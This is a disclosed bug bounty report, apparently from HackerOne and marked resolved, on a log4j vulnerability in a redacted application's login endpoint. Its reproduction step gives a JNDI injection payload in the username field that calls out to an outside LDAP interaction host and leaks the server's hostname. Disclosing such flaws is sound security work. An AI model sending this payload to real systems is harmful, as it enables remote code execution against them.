██████_log4j - https://██████
Critical
Vulnerability Details
Hi security team, i found a log4j vulnerability in your aplication
## Impact
Logging untrusted or user controlled data with a vulnerable version of Log4J may result in Remote Code Execution (RCE) against your application. This includes untrusted data included in logged errors such as exception traces, authentication failures, and other unexpected vectors of user controlled input.
## System Host(s)
███████
## Affected Product(s) and Version(s)
## CVE Numbers
## Steps to Reproduce
Send POST request to this endpoint ---> https://██████/mifs/j_spring_security_check
the post request:
j_username=${jndi:ldap://${hostName}.youinteractsserver}&j_password=password&logincontext=employee
## Suggested Mitigation/Remediation Actions
Actions
View on HackerOneReport Stats
- Report ID: 1631364
- State: Closed
- Substate: resolved
- Upvotes: 1